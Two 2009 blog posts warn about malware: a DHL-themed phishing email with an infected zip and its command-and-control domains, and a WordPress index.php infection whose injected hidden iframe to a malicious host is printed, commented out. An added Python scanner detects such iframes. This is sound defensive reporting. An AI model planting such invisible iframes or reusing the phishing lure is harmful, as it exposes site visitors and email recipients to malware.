Archive for the 'Virus' Category

DHL Print Label – MALWARE

Tuesday, October 27th, 2009

I recently received the following email:

Hello!

The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address. 

You may pickup the parcel at our post office personaly!

Please attention!
The shipping label is attached to this e-mail.
Print this label to get this package at our post office.

Please do not reply to this e-mail, it is an unmonitored mailbox.

Thank you,
DHL Global Forwarding Services.

The attached file is DHL_print_label_cef3e.zip; do not open or run it, as it contains malware.

ThreatExpert behavioral analysis:
http://www.threatexpert.com/report.aspx?md5=8960322225b6a842bad87a285f028f5f

Anubis behavioral analysis:
http://anubis.iseclab.org/?action=result&task_id=1eddf69e4a1adce8441a785cef6c52879

See the Web of Trust (WOT) and MalwareURL reports for mmsfoundsystem .ru, a domain to which this malware phones home, and a related domain:

http://www.mywot.com/en/scorecard/mmsfoundsystem.ru
http://www.malwareurl.com/listing.php?domain=mmsfoundsystem.ru

http://www.mywot.com/en/scorecard/mmmserver.ru
http://www.malwareurl.com/listing.php?domain=mmmserver.ru

– 3Monkeys

HTML/FRAMER virus alert from AVG

Friday, July 17th, 2009

I found the HTML/FRAMER virus had infected this site. It has been eradicated!

For those interested, the following code (commented for security) was inserted into the main index (index.php) by some hacker. For those of you with WordPress blogs, I suggest you check your index.php file; the malicious code is inserted at the end of index.php. Other forms of the virus encode the iframe attack.

<!-- <iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> -->
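One way to run the index.php check suggested above across a whole site, as an added example that is not part of the original post. It flags zero-size or hidden iframes like the one shown; the percent-escape and base64 handling is an assumption about what "encode" means here, and the injected.example sample is constructed.

```python
import base64
import pathlib
import re
from urllib.parse import unquote

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# Markers of an invisible frame, including the style="hidden" form from the post.
HIDDEN_RE = re.compile(
    r"""\b(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none"""
    r"""|visibility\s*:\s*hidden|style\s*=\s*["']?hidden""", re.I)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
# Assumption: encoded variants use percent-escapes or a quoted base64 literal.
B64_RE = re.compile(r"""["']([A-Za-z0-9+/]{24,}={0,2})["']""")
# Constructed sample: a hidden frame appended after the closing PHP tag.
SAMPLE = ('<?php get_footer(); ?>\n'
          '<iframe src="http://injected.example/a" width=0 height=0></iframe>')

def decoded_views(text):
    """Yield (label, text) for the raw text and each decodable form of it."""
    yield "raw", text
    if "%3c" in text.lower():
        yield "percent", unquote(text)
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # not valid base64, skip this literal
            continue
        yield "base64", raw.decode("utf-8", "replace")

def find_hidden_iframes(text):
    """Return sorted (encoding, src) pairs for invisible iframes in text."""
    hits = set()
    for label, view in decoded_views(text):
        for tag in IFRAME_RE.findall(view):
            if HIDDEN_RE.search(tag):
                src = SRC_RE.search(tag)
                hits.add((label, src.group(1) if src else ""))
    return sorted(hits)

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Map each file under root that contains a hidden iframe to its hits."""
    report = {}
    for path in pathlib.Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_hidden_iframes(path.read_text("utf-8", "replace"))
            if hits:
                report[str(path)] = hits
    return report
```

Calling scan_tree on the web root returns a dictionary of affected files; any src it reports that you did not add yourself is worth checking against a clean copy of the theme or core file.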